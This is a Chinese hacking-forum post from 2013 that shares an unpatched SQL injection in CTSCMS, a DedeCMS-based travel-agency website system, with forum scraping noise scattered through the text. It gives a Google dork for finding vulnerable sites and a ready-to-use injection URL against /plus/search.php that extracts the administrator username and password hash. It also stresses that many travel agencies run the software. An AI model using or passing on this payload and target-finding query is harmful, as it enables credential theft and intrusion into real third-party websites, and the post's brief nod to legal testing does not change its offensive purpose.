新年多放点0day,小范围共享!5 X7 ?" Z) _0 {- d' z" @; P$ Q
中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。
5 f. ^. E% c. n0 C) O0 U/ ]9 VGoogle:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社' l [! ~/ `) }
POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a7 A- y( B' U1 ?& m
; i7 ?3 f" F! ^" W
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用
, _; j; k* o( e9 K4 H/ d, S) }5 Q6 l5 l' ^9 Q
/ v; Q; n9 i5 U* O3 C3 L
: ~$ J( a( J" g* R2 B4 L5 c" `' d ; @3 l; w: B: X2 J4 k
# s% ?$ n3 k; A5 R7 n$ d3 A很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....; p+ j. T( F0 D: Z" F
- }3 b- J( x* [ |
发表于 2013-2-4 16:11:01
收藏
支持
反对